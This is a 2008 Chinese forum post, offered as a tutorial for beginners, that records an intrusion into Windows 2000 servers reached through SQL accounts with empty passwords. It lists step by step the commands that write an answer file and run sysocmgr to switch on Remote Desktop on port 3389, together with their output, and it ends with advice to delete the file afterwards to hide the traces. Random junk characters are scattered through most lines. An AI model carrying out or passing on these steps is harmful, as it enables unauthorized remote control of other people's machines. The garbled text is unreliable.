草根站长论坛 » 草根网站建设运营 » SQL开3389入侵实例记录（献给草根）

jis21 发表于 2008-4-23 18:38

SQL开3389入侵实例记录（献给草根）

把一次从SQL开3389的记录过程发出来，望对新手有用
&c#hhJ8J-QeYA .ol%^Qn){&V4s
注：//为注释l?3C5B'cu4U
实例过程：'u7_ m el%t'|/tK
连接到主机:202.xxx.xxx.xxx //大家可以用sql连接器连上有空口令的sql肉机
k_3rV)n 命令:              type c:\boot.ini  输入命令，看系统，server版的才能 开33893S6eI.`t3yA(V(H
执行成功,结果:
\ [K/R`[ [boot loader]8Hr3S.m#WMV
timeout=30N]P vb8d9Cd
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
0hbQ(j\4h,m [operating systems]WI}b}a,_,M vP
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect2|4Ys2dLXaZ4u
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect9A Yk(S K*W8]FK^0o

5sQv]Q 命令:        echo [Components] > c:\duguxike  在c盘根目录建写入一个文件，文件名duguxike大家可以自己改为自己的
~x/ta"W;W-] 执行成功,结果:o.O2xN(` X

8U2J9? v,kpE)l_*s b-if1L`O
命令:              echo TsEnable = on >> c:\duguxike      追加写入
@(MQ#Z(Bt 执行成功,结果:
yGW4}E&O
@p C
z%P%c%o%u*A1{c'v8A$K R#R [    post]命令:                      type c:\duguxike        看看duguxike里的内容是否正确)E)ET }{t
T
执行成功,结果:
"^3^{H Lq
c [Components] i `f6zk+yif"HI
TsEnable = on
x8jtk!Z6I(tt TsEnable = on
2FHE KQ&Y
9O1glb[|j 命令:            sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\duguxike /q          开3389，成功的话过会肉机会重启！！ o5Sm HGiL-n2G
执行成功,结果:
nlw5a3FN;C%f2Yl GetLocalManagedApplications returned (2)
#c?T5LR1D*Xy w*~1y:CLm+h5O
之后就看大家的了，不过要记得册除新建的duguxike文件哦！！！

2008vps.net 发表于 2008-4-23 19:24

支持一下:31:

查看完整版本: SQL开3389入侵实例记录（献给草根）